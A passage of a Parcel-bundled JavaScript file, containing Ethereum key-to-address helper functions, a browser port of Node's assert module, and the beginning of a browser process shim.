 * Accepts "Ethereum public keys" and SEC1 encoded keys.
 * @param pubKey The two points of an uncompressed key, unless sanitize is enabled
 * @param sanitize Accept public keys in other formats
 */ var $d42806dba2e311ba$var$pubToAddress = function(pubKey, sanitize) {
    if (sanitize === void 0) sanitize = false;
    (0, $7jIKp.assertIsBuffer)(pubKey);
    if (sanitize && pubKey.length !== 64) pubKey = $d42806dba2e311ba$require$Buffer.from((0, $dXQCW.publicKeyConvert)(pubKey, false).slice(1));
    (0, $d42806dba2e311ba$var$assert_1.default)(pubKey.length === 64);
    // Only take the lower 160bits of the hash
    return (0, $gKSHR.keccak)(pubKey).slice(-20);
};
module.exports.pubToAddress = $d42806dba2e311ba$var$pubToAddress;
module.exports.publicToAddress = module.exports.pubToAddress;
/**
 * Returns the ethereum public key of a given private key.
 * @param privateKey A private key must be 256 bits wide
 */ var $d42806dba2e311ba$var$privateToPublic = function(privateKey) {
    (0, $7jIKp.assertIsBuffer)(privateKey);
    // skip the type flag and use the X, Y points
    return $d42806dba2e311ba$require$Buffer.from((0, $dXQCW.publicKeyCreate)(privateKey, false)).slice(1);
};
module.exports.privateToPublic = $d42806dba2e311ba$var$privateToPublic;
/**
 * Returns the ethereum address of a given private key.
 * @param privateKey A private key must be 256 bits wide
 */ var $d42806dba2e311ba$var$privateToAddress = function(privateKey) {
    return (0, module.exports.publicToAddress)((0, module.exports.privateToPublic)(privateKey));
};
module.exports.privateToAddress = $d42806dba2e311ba$var$privateToAddress;
/**
 * Converts a public key to the Ethereum format.
 */ var $d42806dba2e311ba$var$importPublic = function(publicKey) {
    (0, $7jIKp.assertIsBuffer)(publicKey);
    if (publicKey.length !== 64) publicKey = $d42806dba2e311ba$require$Buffer.from((0, $dXQCW.publicKeyConvert)(publicKey, false).slice(1));
    return publicKey;
};
module.exports.importPublic = $d42806dba2e311ba$var$importPublic;
/**
 * Returns the zero address.
 */ var $d42806dba2e311ba$var$zeroAddress = function() {
    var addressLength = 20;
    var addr = (0, $b61lJ.zeros)(addressLength);
    return (0, $b61lJ.bufferToHex)(addr);
};
module.exports.zeroAddress = $d42806dba2e311ba$var$zeroAddress;
/**
 * Checks if a given address is the zero address.
 */ var $d42806dba2e311ba$var$isZeroAddress = function(hexAddress) {
    try {
        (0, $7jIKp.assertIsString)(hexAddress);
    } catch (e) {
        return false;
    }
    var zeroAddr = (0, module.exports.zeroAddress)();
    return zeroAddr === hexAddress;
};
module.exports.isZeroAddress = $d42806dba2e311ba$var$isZeroAddress;

});
parcelRequire.register("aLUwE", function(module, exports) {
// Currently in sync with Node.js lib/assert.js
// https://github.com/nodejs/node/commit/2a51ae424a513ec9a6aa3466baa0cc1d55dd4f3b
// Originally from narwhal.js (http://narwhaljs.org)
// Copyright (c) 2009 Thomas Robinson <280north.com>
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the 'Software'), to
// deal in the Software without restriction, including without limitation the
// rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
// sell copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

var $hPtJY = parcelRequire("hPtJY");
"use strict";
function $7d7a23f7babfddb7$var$_typeof(obj) {
    if (typeof Symbol === "function" && typeof Symbol.iterator === "symbol") $7d7a23f7babfddb7$var$_typeof = function _typeof(obj) {
        return typeof obj;
    };
    else $7d7a23f7babfddb7$var$_typeof = function _typeof(obj) {
        return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj;
    };
    return $7d7a23f7babfddb7$var$_typeof(obj);
}
function $7d7a23f7babfddb7$var$_classCallCheck(instance, Constructor) {
    if (!(instance instanceof Constructor)) throw new TypeError("Cannot call a class as a function");
}

var $cCihK = parcelRequire("cCihK");
var $7d7a23f7babfddb7$var$_require$codes = $cCihK.codes, $7d7a23f7babfddb7$var$ERR_AMBIGUOUS_ARGUMENT = $7d7a23f7babfddb7$var$_require$codes.ERR_AMBIGUOUS_ARGUMENT, $7d7a23f7babfddb7$var$ERR_INVALID_ARG_TYPE = $7d7a23f7babfddb7$var$_require$codes.ERR_INVALID_ARG_TYPE, $7d7a23f7babfddb7$var$ERR_INVALID_ARG_VALUE = $7d7a23f7babfddb7$var$_require$codes.ERR_INVALID_ARG_VALUE, $7d7a23f7babfddb7$var$ERR_INVALID_RETURN_VALUE = $7d7a23f7babfddb7$var$_require$codes.ERR_INVALID_RETURN_VALUE, $7d7a23f7babfddb7$var$ERR_MISSING_ARGS = $7d7a23f7babfddb7$var$_require$codes.ERR_MISSING_ARGS;

var $8pS6q = parcelRequire("8pS6q");

var $N7Lcz = parcelRequire("N7Lcz");
var $7d7a23f7babfddb7$var$inspect = $N7Lcz.inspect;

var $N7Lcz = parcelRequire("N7Lcz");
var $7d7a23f7babfddb7$require$_require$types = $N7Lcz.types;
var $7d7a23f7babfddb7$var$isPromise = $7d7a23f7babfddb7$require$_require$types.isPromise, $7d7a23f7babfddb7$var$isRegExp = $7d7a23f7babfddb7$require$_require$types.isRegExp;

var $7d7a23f7babfddb7$var$objectAssign = Object.assign ? Object.assign : (parcelRequire("dYBnA")).assign;

var $7d7a23f7babfddb7$var$objectIs = Object.is ? Object.is : (parcelRequire("eT9RM"));
var $7d7a23f7babfddb7$var$errorCache = new Map();
var $7d7a23f7babfddb7$var$isDeepEqual;
var $7d7a23f7babfddb7$var$isDeepStrictEqual;
var $7d7a23f7babfddb7$var$parseExpressionAt;
var $7d7a23f7babfddb7$var$findNodeAround;
var $7d7a23f7babfddb7$var$decoder;

function $7d7a23f7babfddb7$var$lazyLoadComparison() {
    var comparison = (parcelRequire("3LKhK"));
    $7d7a23f7babfddb7$var$isDeepEqual = comparison.isDeepEqual;
    $7d7a23f7babfddb7$var$isDeepStrictEqual = comparison.isDeepStrictEqual;
} // Escape control characters but not \n and \t to keep the line breaks and
// indentation intact.
// eslint-disable-next-line no-control-regex
var $7d7a23f7babfddb7$var$escapeSequencesRegExp = /[\x00-\x08\x0b\x0c\x0e-\x1f]/g;
var $7d7a23f7babfddb7$var$meta = [
    "\\u0000",
    "\\u0001",
    "\\u0002",
    "\\u0003",
    "\\u0004",
    "\\u0005",
    "\\u0006",
    "\\u0007",
    "\\b",
    "",
    "",
    "\\u000b",
    "\\f",
    "",
    "\\u000e",
    "\\u000f",
    "\\u0010",
    "\\u0011",
    "\\u0012",
    "\\u0013",
    "\\u0014",
    "\\u0015",
    "\\u0016",
    "\\u0017",
    "\\u0018",
    "\\u0019",
    "\\u001a",
    "\\u001b",
    "\\u001c",
    "\\u001d",
    "\\u001e",
    "\\u001f"
];
var $7d7a23f7babfddb7$var$escapeFn = function escapeFn(str) {
    return $7d7a23f7babfddb7$var$meta[str.charCodeAt(0)];
};
var $7d7a23f7babfddb7$var$warned = false; // The assert module provides functions that throw
// AssertionError's when particular conditions are not met. The
// assert module must conform to the following interface.
var $7d7a23f7babfddb7$var$assert = module.exports = $7d7a23f7babfddb7$var$ok;
var $7d7a23f7babfddb7$var$NO_EXCEPTION_SENTINEL = {}; // All of the following functions must throw an AssertionError
// when a corresponding condition is not met, with a message that
// may be undefined if not provided. All assertion methods provide
// both the actual and expected values to the assertion error for
// display purposes.
function $7d7a23f7babfddb7$var$innerFail(obj) {
    if (obj.message instanceof Error) throw obj.message;
    throw new $8pS6q(obj);
}
function $7d7a23f7babfddb7$var$fail(actual, expected, message, operator, stackStartFn) {
    var argsLen = arguments.length;
    var internalMessage;
    if (argsLen === 0) internalMessage = "Failed";
    else if (argsLen === 1) {
        message = actual;
        actual = undefined;
    } else {
        if ($7d7a23f7babfddb7$var$warned === false) {
            $7d7a23f7babfddb7$var$warned = true;
            var warn = $hPtJY.emitWarning ? $hPtJY.emitWarning : console.warn.bind(console);
            warn("assert.fail() with more than one argument is deprecated. Please use assert.strictEqual() instead or only pass a message.", "DeprecationWarning", "DEP0094");
        }
        if (argsLen === 2) operator = "!=";
    }
    if (message instanceof Error) throw message;
    var errArgs = {
        actual: actual,
        expected: expected,
        operator: operator === undefined ? "fail" : operator,
        stackStartFn: stackStartFn || $7d7a23f7babfddb7$var$fail
    };
    if (message !== undefined) errArgs.message = message;
    var err = new $8pS6q(errArgs);
    if (internalMessage) {
        err.message = internalMessage;
        err.generatedMessage = true;
    }
    throw err;
}
$7d7a23f7babfddb7$var$assert.fail = $7d7a23f7babfddb7$var$fail; // The AssertionError is defined in internal/error.
$7d7a23f7babfddb7$var$assert.AssertionError = $8pS6q;
function $7d7a23f7babfddb7$var$innerOk(fn, argLen, value, message) {
    if (!value) {
        var generatedMessage = false;
        if (argLen === 0) {
            generatedMessage = true;
            message = "No value argument passed to `assert.ok()`";
        } else if (message instanceof Error) throw message;
        var err = new $8pS6q({
            actual: value,
            expected: true,
            message: message,
            operator: "==",
            stackStartFn: fn
        });
        err.generatedMessage = generatedMessage;
        throw err;
    }
} // Pure assertion tests whether a value is truthy, as determined
// by !!value.
function $7d7a23f7babfddb7$var$ok() {
    for(var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++)args[_key] = arguments[_key];
    $7d7a23f7babfddb7$var$innerOk.apply(void 0, [
        $7d7a23f7babfddb7$var$ok,
        args.length
    ].concat(args));
}
$7d7a23f7babfddb7$var$assert.ok = $7d7a23f7babfddb7$var$ok; // The equality assertion tests shallow, coercive equality with ==.
/* eslint-disable no-restricted-properties */ $7d7a23f7babfddb7$var$assert.equal = function equal(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
     // eslint-disable-next-line eqeqeq
    if (actual != expected) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "==",
        stackStartFn: equal
    });
}; // The non-equality assertion tests for whether two objects are not
// equal with !=.
$7d7a23f7babfddb7$var$assert.notEqual = function notEqual(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
     // eslint-disable-next-line eqeqeq
    if (actual == expected) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "!=",
        stackStartFn: notEqual
    });
}; // The equivalence assertion tests a deep equality relation.
$7d7a23f7babfddb7$var$assert.deepEqual = function deepEqual(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
    if ($7d7a23f7babfddb7$var$isDeepEqual === undefined) $7d7a23f7babfddb7$var$lazyLoadComparison();
    if (!$7d7a23f7babfddb7$var$isDeepEqual(actual, expected)) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "deepEqual",
        stackStartFn: deepEqual
    });
}; // The non-equivalence assertion tests for any deep inequality.
$7d7a23f7babfddb7$var$assert.notDeepEqual = function notDeepEqual(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
    if ($7d7a23f7babfddb7$var$isDeepEqual === undefined) $7d7a23f7babfddb7$var$lazyLoadComparison();
    if ($7d7a23f7babfddb7$var$isDeepEqual(actual, expected)) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "notDeepEqual",
        stackStartFn: notDeepEqual
    });
};
/* eslint-enable */ $7d7a23f7babfddb7$var$assert.deepStrictEqual = function deepStrictEqual(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
    if ($7d7a23f7babfddb7$var$isDeepEqual === undefined) $7d7a23f7babfddb7$var$lazyLoadComparison();
    if (!$7d7a23f7babfddb7$var$isDeepStrictEqual(actual, expected)) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "deepStrictEqual",
        stackStartFn: deepStrictEqual
    });
};
$7d7a23f7babfddb7$var$assert.notDeepStrictEqual = $7d7a23f7babfddb7$var$notDeepStrictEqual;
function $7d7a23f7babfddb7$var$notDeepStrictEqual(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
    if ($7d7a23f7babfddb7$var$isDeepEqual === undefined) $7d7a23f7babfddb7$var$lazyLoadComparison();
    if ($7d7a23f7babfddb7$var$isDeepStrictEqual(actual, expected)) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "notDeepStrictEqual",
        stackStartFn: $7d7a23f7babfddb7$var$notDeepStrictEqual
    });
}
$7d7a23f7babfddb7$var$assert.strictEqual = function strictEqual(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
    if (!$7d7a23f7babfddb7$var$objectIs(actual, expected)) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "strictEqual",
        stackStartFn: strictEqual
    });
};
$7d7a23f7babfddb7$var$assert.notStrictEqual = function notStrictEqual(actual, expected, message) {
    if (arguments.length < 2) throw new $7d7a23f7babfddb7$var$ERR_MISSING_ARGS("actual", "expected");
    if ($7d7a23f7babfddb7$var$objectIs(actual, expected)) $7d7a23f7babfddb7$var$innerFail({
        actual: actual,
        expected: expected,
        message: message,
        operator: "notStrictEqual",
        stackStartFn: notStrictEqual
    });
};
var $7d7a23f7babfddb7$var$Comparison = function Comparison(obj, keys, actual) {
    var _this = this;
    $7d7a23f7babfddb7$var$_classCallCheck(this, Comparison);
    keys.forEach(function(key) {
        if (key in obj) {
            if (actual !== undefined && typeof actual[key] === "string" && $7d7a23f7babfddb7$var$isRegExp(obj[key]) && obj[key].test(actual[key])) _this[key] = actual[key];
            else _this[key] = obj[key];
        }
    });
};
function $7d7a23f7babfddb7$var$compareExceptionKey(actual, expected, key, message, keys, fn) {
    if (!(key in actual) || !$7d7a23f7babfddb7$var$isDeepStrictEqual(actual[key], expected[key])) {
        if (!message) {
            // Create placeholder objects to create a nice output.
            var a = new $7d7a23f7babfddb7$var$Comparison(actual, keys);
            var b = new $7d7a23f7babfddb7$var$Comparison(expected, keys, actual);
            var err = new $8pS6q({
                actual: a,
                expected: b,
                operator: "deepStrictEqual",
                stackStartFn: fn
            });
            err.actual = actual;
            err.expected = expected;
            err.operator = fn.name;
            throw err;
        }
        $7d7a23f7babfddb7$var$innerFail({
            actual: actual,
            expected: expected,
            message: message,
            operator: fn.name,
            stackStartFn: fn
        });
    }
}
function $7d7a23f7babfddb7$var$expectedException(actual, expected, msg, fn) {
    if (typeof expected !== "function") {
        if ($7d7a23f7babfddb7$var$isRegExp(expected)) return expected.test(actual); // assert.doesNotThrow does not accept objects.
        if (arguments.length === 2) throw new $7d7a23f7babfddb7$var$ERR_INVALID_ARG_TYPE("expected", [
            "Function",
            "RegExp"
        ], expected);
         // Handle primitives properly.
        if ($7d7a23f7babfddb7$var$_typeof(actual) !== "object" || actual === null) {
            var err = new $8pS6q({
                actual: actual,
                expected: expected,
                message: msg,
                operator: "deepStrictEqual",
                stackStartFn: fn
            });
            err.operator = fn.name;
            throw err;
        }
        var keys = Object.keys(expected); // Special handle errors to make sure the name and the message are compared
        // as well.
        if (expected instanceof Error) keys.push("name", "message");
        else if (keys.length === 0) throw new $7d7a23f7babfddb7$var$ERR_INVALID_ARG_VALUE("error", expected, "may not be an empty object");
        if ($7d7a23f7babfddb7$var$isDeepEqual === undefined) $7d7a23f7babfddb7$var$lazyLoadComparison();
        keys.forEach(function(key) {
            if (typeof actual[key] === "string" && $7d7a23f7babfddb7$var$isRegExp(expected[key]) && expected[key].test(actual[key])) return;
            $7d7a23f7babfddb7$var$compareExceptionKey(actual, expected, key, msg, keys, fn);
        });
        return true;
    } // Guard instanceof against arrow functions as they don't have a prototype.
    if (expected.prototype !== undefined && actual instanceof expected) return true;
    if (Error.isPrototypeOf(expected)) return false;
    return expected.call({}, actual) === true;
}
function $7d7a23f7babfddb7$var$getActual(fn) {
    if (typeof fn !== "function") throw new $7d7a23f7babfddb7$var$ERR_INVALID_ARG_TYPE("fn", "Function", fn);
    try {
        fn();
    } catch (e) {
        return e;
    }
    return $7d7a23f7babfddb7$var$NO_EXCEPTION_SENTINEL;
}
function $7d7a23f7babfddb7$var$checkIsPromise(obj) {
    // Accept native ES6 promises and promises that are implemented in a similar
    // way. Do not accept thenables that use a function as `obj` and that have no
    // `catch` handler.
    // TODO: thenables are checked up until they have the correct methods,
    // but according to documentation, the `then` method should receive
    // the `fulfill` and `reject` arguments as well or it may be never resolved.
    return $7d7a23f7babfddb7$var$isPromise(obj) || obj !== null && $7d7a23f7babfddb7$var$_typeof(obj) === "object" && typeof obj.then === "function" && typeof obj.catch === "function";
}
function $7d7a23f7babfddb7$var$waitForActual(promiseFn) {
    return Promise.resolve().then(function() {
        var resultPromise;
        if (typeof promiseFn === "function") {
            // Return a rejected promise if `promiseFn` throws synchronously.
            resultPromise = promiseFn(); // Fail in case no promise is returned.
            if (!$7d7a23f7babfddb7$var$checkIsPromise(resultPromise)) throw new $7d7a23f7babfddb7$var$ERR_INVALID_RETURN_VALUE("instance of Promise", "promiseFn", resultPromise);
        } else if ($7d7a23f7babfddb7$var$checkIsPromise(promiseFn)) resultPromise = promiseFn;
        else throw new $7d7a23f7babfddb7$var$ERR_INVALID_ARG_TYPE("promiseFn", [
            "Function",
            "Promise"
        ], promiseFn);
        return Promise.resolve().then(function() {
            return resultPromise;
        }).then(function() {
            return $7d7a23f7babfddb7$var$NO_EXCEPTION_SENTINEL;
        }).catch(function(e) {
            return e;
        });
    });
}
function $7d7a23f7babfddb7$var$expectsError(stackStartFn, actual, error, message) {
    if (typeof error === "string") {
        if (arguments.length === 4) throw new $7d7a23f7babfddb7$var$ERR_INVALID_ARG_TYPE("error", [
            "Object",
            "Error",
            "Function",
            "RegExp"
        ], error);
        if ($7d7a23f7babfddb7$var$_typeof(actual) === "object" && actual !== null) {
            if (actual.message === error) throw new $7d7a23f7babfddb7$var$ERR_AMBIGUOUS_ARGUMENT("error/message", 'The error message "'.concat(actual.message, '" is identical to the message.'));
        } else if (actual === error) throw new $7d7a23f7babfddb7$var$ERR_AMBIGUOUS_ARGUMENT("error/message", 'The error "'.concat(actual, '" is identical to the message.'));
        message = error;
        error = undefined;
    } else if (error != null && $7d7a23f7babfddb7$var$_typeof(error) !== "object" && typeof error !== "function") throw new $7d7a23f7babfddb7$var$ERR_INVALID_ARG_TYPE("error", [
        "Object",
        "Error",
        "Function",
        "RegExp"
    ], error);
    if (actual === $7d7a23f7babfddb7$var$NO_EXCEPTION_SENTINEL) {
        var details = "";
        if (error && error.name) details += " (".concat(error.name, ")");
        details += message ? ": ".concat(message) : ".";
        var fnType = stackStartFn.name === "rejects" ? "rejection" : "exception";
        $7d7a23f7babfddb7$var$innerFail({
            actual: undefined,
            expected: error,
            operator: stackStartFn.name,
            message: "Missing expected ".concat(fnType).concat(details),
            stackStartFn: stackStartFn
        });
    }
    if (error && !$7d7a23f7babfddb7$var$expectedException(actual, error, message, stackStartFn)) throw actual;
}
function $7d7a23f7babfddb7$var$expectsNoError(stackStartFn, actual, error, message) {
    if (actual === $7d7a23f7babfddb7$var$NO_EXCEPTION_SENTINEL) return;
    if (typeof error === "string") {
        message = error;
        error = undefined;
    }
    if (!error || $7d7a23f7babfddb7$var$expectedException(actual, error)) {
        var details = message ? ": ".concat(message) : ".";
        var fnType = stackStartFn.name === "doesNotReject" ? "rejection" : "exception";
        $7d7a23f7babfddb7$var$innerFail({
            actual: actual,
            expected: error,
            operator: stackStartFn.name,
            message: "Got unwanted ".concat(fnType).concat(details, "\n") + 'Actual message: "'.concat(actual && actual.message, '"'),
            stackStartFn: stackStartFn
        });
    }
    throw actual;
}
$7d7a23f7babfddb7$var$assert.throws = function throws(promiseFn) {
    for(var _len2 = arguments.length, args = new Array(_len2 > 1 ? _len2 - 1 : 0), _key2 = 1; _key2 < _len2; _key2++)args[_key2 - 1] = arguments[_key2];
    $7d7a23f7babfddb7$var$expectsError.apply(void 0, [
        throws,
        $7d7a23f7babfddb7$var$getActual(promiseFn)
    ].concat(args));
};
$7d7a23f7babfddb7$var$assert.rejects = function rejects(promiseFn) {
    for(var _len3 = arguments.length, args = new Array(_len3 > 1 ? _len3 - 1 : 0), _key3 = 1; _key3 < _len3; _key3++)args[_key3 - 1] = arguments[_key3];
    return $7d7a23f7babfddb7$var$waitForActual(promiseFn).then(function(result) {
        return $7d7a23f7babfddb7$var$expectsError.apply(void 0, [
            rejects,
            result
        ].concat(args));
    });
};
$7d7a23f7babfddb7$var$assert.doesNotThrow = function doesNotThrow(fn) {
    for(var _len4 = arguments.length, args = new Array(_len4 > 1 ? _len4 - 1 : 0), _key4 = 1; _key4 < _len4; _key4++)args[_key4 - 1] = arguments[_key4];
    $7d7a23f7babfddb7$var$expectsNoError.apply(void 0, [
        doesNotThrow,
        $7d7a23f7babfddb7$var$getActual(fn)
    ].concat(args));
};
$7d7a23f7babfddb7$var$assert.doesNotReject = function doesNotReject(fn) {
    for(var _len5 = arguments.length, args = new Array(_len5 > 1 ? _len5 - 1 : 0), _key5 = 1; _key5 < _len5; _key5++)args[_key5 - 1] = arguments[_key5];
    return $7d7a23f7babfddb7$var$waitForActual(fn).then(function(result) {
        return $7d7a23f7babfddb7$var$expectsNoError.apply(void 0, [
            doesNotReject,
            result
        ].concat(args));
    });
};
$7d7a23f7babfddb7$var$assert.ifError = function ifError(err) {
    if (err !== null && err !== undefined) {
        var message = "ifError got unwanted exception: ";
        if ($7d7a23f7babfddb7$var$_typeof(err) === "object" && typeof err.message === "string") {
            if (err.message.length === 0 && err.constructor) message += err.constructor.name;
            else message += err.message;
        } else message += $7d7a23f7babfddb7$var$inspect(err);
        var newErr = new $8pS6q({
            actual: err,
            expected: null,
            operator: "ifError",
            message: message,
            stackStartFn: ifError
        }); // Make sure we actually have a stack trace!
        var origStack = err.stack;
        if (typeof origStack === "string") {
            // This will remove any duplicated frames from the error frames taken
            // from within `ifError` and add the original error frames to the newly
            // created ones.
            var tmp2 = origStack.split("\n");
            tmp2.shift(); // Filter all frames existing in err.stack.
            var tmp1 = newErr.stack.split("\n");
            for(var i = 0; i < tmp2.length; i++){
                // Find the first occurrence of the frame.
                var pos = tmp1.indexOf(tmp2[i]);
                if (pos !== -1) {
                    // Only keep new frames.
                    tmp1 = tmp1.slice(0, pos);
                    break;
                }
            }
            newErr.stack = "".concat(tmp1.join("\n"), "\n").concat(tmp2.join("\n"));
        }
        throw newErr;
    }
}; // Expose a strict only variant of assert
function $7d7a23f7babfddb7$var$strict() {
    for(var _len6 = arguments.length, args = new Array(_len6), _key6 = 0; _key6 < _len6; _key6++)args[_key6] = arguments[_key6];
    $7d7a23f7babfddb7$var$innerOk.apply(void 0, [
        $7d7a23f7babfddb7$var$strict,
        args.length
    ].concat(args));
}
$7d7a23f7babfddb7$var$assert.strict = $7d7a23f7babfddb7$var$objectAssign($7d7a23f7babfddb7$var$strict, $7d7a23f7babfddb7$var$assert, {
    equal: $7d7a23f7babfddb7$var$assert.strictEqual,
    deepEqual: $7d7a23f7babfddb7$var$assert.deepStrictEqual,
    notEqual: $7d7a23f7babfddb7$var$assert.notStrictEqual,
    notDeepEqual: $7d7a23f7babfddb7$var$assert.notDeepStrictEqual
});
$7d7a23f7babfddb7$var$assert.strict.strict = $7d7a23f7babfddb7$var$assert.strict;

});
parcelRequire.register("hPtJY", function(module, exports) {
// shim for using process in browser
var $cfae44f0dfdf62c0$var$process = module.exports = {};
// cached from whatever global is present so that test runners that stub it
// don't break things.  But we need to wrap it in a try catch in case it is
// wrapped in strict mode code which doesn't define any globals.  It's inside a
// function because try/catches deoptimize in certain engines.
var $cfae44f0dfdf62c0$var$cachedSetTimeout;
var $cfae44f0dfdf62c0$var$cachedClearTimeout;
function $cfae44f0dfdf62c0$var$defaultSetTimout() {
    throw new Error("setTimeout has not been defined");
}
function $cfae44f0dfdf62c0$var$defaultClearTimeout() {
    throw new Error("clearTimeout has not been defined");
}
(function() {
    try {
        if (typeof setTimeout === "function") $cfae44f0dfdf62c0$var$cachedSetTimeout = setTimeout;
        else $cfae44f0dfdf62c0$var$cachedSetTimeout = $cfae44f0dfdf62c0$var$defaultSetTimout;
    } catch (e) {
        $cfae44f0dfdf62c0$var$cachedSetTimeout = $cfae44f0dfdf62c0$var$defaultSetTimout;
    }
    try {
        if (typeof clearTimeout === "function") $cfae44f0dfdf62c0$var$cachedClearTimeout = clearTimeout;
        else $cfae44f0dfdf62c0$var$cachedClearTimeout = $cfae44f0dfdf62c0$var$defaultClearTimeout;
    } catch (e) {
        $cfae44f0dfdf62c0$var$cachedClearTimeout = $cfae44f0dfdf62c0$var$defaultClearTimeout;
    }
})();
function $cfae44f0dfdf62c0$var$runTimeout(fun) {
    if ($cfae44f0dfdf62c0$var$cachedSetTimeout === setTimeout) //normal enviroments in sane situations
    return setTimeout(fun, 0);
    // if setTimeout wasn't available but was latter defined
    if (($cfae44f0dfdf62c0$var$cachedSetTimeout === $cfae44f0dfdf62c0$var$defaultSetTimout || !$cfae44f0dfdf62c0$var$cachedSetTimeout) && setTimeout) {
        $cfae44f0dfdf62c0$var$cachedSetTimeout = setTimeout;
        return setTimeout(fun, 0);
    }
    try {
        // when when somebody has screwed with setTimeout but no I.E. maddness
        return $cfae44f0dfdf62c0$var$cachedSetTimeout(fun, 0);
    } catch (e) {
        try {
            // When we are in I.E. but the script has been evaled so I.E. doesn't trust the global object when called normally
            return $cfae44f0dfdf62c0$var$cachedSetTimeout.call(null, fun, 0);
        } catch (e) {
            // same as above but when it's a version of I.E. that must have the global object for 'this', hopfully our context correct otherwise it will throw a global error
            return $cfae44f0dfdf62c0$var$cachedSetTimeout.call(this, fun, 0);
        }
    }
}
function $cfae44f0dfdf62c0$var$runClearTimeout(marker) {
    if ($cfae44f0dfdf62c0$var$cachedClearTimeout === clearTimeout) //normal enviroments in sane situations
    return clearTimeout(marker);
    // if clearTimeout wasn't available but was latter defined
    if (($cfae44f0dfdf62c0$var$cachedClearTimeout === $cfae44f0dfdf62c0$var$defaultClearTimeout || !$cfae44f0dfdf62c0$var$cachedClearTimeout) && clearTimeout) {
        $cfae44f0dfdf62c0$var$cachedClearTimeout = clearTimeout;
        return clearTimeout(marker);
    }
    try {
        // when when somebody has screwed with setTimeout but no I.E. maddness
        return $cfae44f0dfdf62c0$var$cachedClearTimeout(marker);
    } catch (e) {
        try {
            // When we are in I.E. but the script has been evaled so I.E. doesn't  trust the global object when called normally
            return $cfae44f0dfdf62c0$var$cachedClearTimeout.call(null, marker);
        } catch (e) {
            // same as above but when it's a version of I.E. that must have the global object for 'this', hopfully our context correct otherwise it will throw a global error.
            // Some versions of I.E. have different rules for clearTimeout vs setTimeout
            return $cfae44f0dfdf62c0$var$cachedClearTimeout.call(this, marker);
        }
    }
}
var $cfae44f0dfdf62c0$var$queue = [];
var $cfae44f0dfdf62c0$var$draining = false;
var $cfae44f0dfdf62c0$var$currentQueue;
var $cfae44f0dfdf62c0$var$queueIndex = -1;
function $cfae44f0dfdf62c0$var$cleanUpNextTick() {
    if (!$cfae44f0dfdf62c0$var$draining || !$cfae44f0dfdf62c0$var$currentQueue) return;
    $cfae44f0dfdf62c0$var$draining = false;
    if ($cfae44f0dfdf62c0$var$currentQueue.length) $cfae44f0dfdf62c0$var$queue = $cfae44f0dfdf62c0$var$currentQueue.concat($cfae44f0dfdf62c0$var$queue);
    else $cfae44f0dfdf62c0$var$queueIndex = -1;
    if ($cfae44f0dfdf62c0$var$queue.length) $cfae44f0dfdf62c0$var$drainQueue();
}
function $cfae44f0dfdf62c0$var$drainQueue() {
    if ($cfae44f0dfdf62c0$var$draining) return;
    var timeout = $cfae44f0dfdf62c0$var$runTimeout($cfae44f0dfdf62c0$var$cleanUpNextTick);
    $cfae44f0dfdf62c0$var$draining = true;
    var len = $cfae44f0dfdf62c0$var$queue.length;
    while(len){
        $cfae44f0dfdf62c0$var$currentQueue = $cfae44f0dfdf62c0$var$queue;
        $cfae44f0dfdf62c0$var$queue = [];
        while(++$cfae44f0dfdf62c0$var$queueIndex < len)if ($cfae44f0dfdf62c0$var$currentQueue) $cfae44f0dfdf62c0$var$currentQueue[$cfae44f0dfdf62c0$var$queueIndex].run();
        $cfae44f0dfdf62c0$var$queueIndex = -1;
        len = $cfae44f0dfdf62c0$var$queue.length;
    }
    $cfae44f0dfdf62c0$var$currentQueue = null;
    $cfae44f0dfdf62c0$var$draining = false;
    $cfae44f0dfdf62c0$var$runClearTimeout(timeout);
}
$cfae44f0dfdf62c0$var$process.nextTick = function(fun) {
    var args = new Array(arguments.length - 1);
    if (arguments.length > 1) for(var i = 1; i < arguments.length; i++)args[i - 1] = arguments[i];
    $cfae44f0dfdf62c0$var$queue.push(new $cfae44f0dfdf62c0$var$Item(fun, args));
